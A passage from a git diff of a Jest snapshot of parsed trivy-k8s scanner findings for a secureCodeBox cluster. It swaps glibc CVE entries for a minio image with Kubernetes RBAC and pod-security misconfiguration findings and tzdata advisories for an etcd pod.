"2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'ClusterRole/system:aggregate-to-admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "category": "Misconfiguration", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-admin", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'system:aggregate-to-admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'system:aggregate-to-edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2020d-0+deb9u1", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-2424-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new upstream version", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2020e-0+deb9u1", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-2509-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new upstream version", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb9u1", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-2542-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new upstream version", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb9u2", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-2797-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new upstream version", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb9u3", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-2963-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb9u4", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3051-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'etcd' of Pod 'etcd-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, ], "severity": "LOW", @@ -115747,62 +115828,57 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'etcd-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, ], "severity": "LOW", @@ -115810,150 +115886,260 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.31-13+deb11u4", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", ], }, - "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: Off-by-one buffer 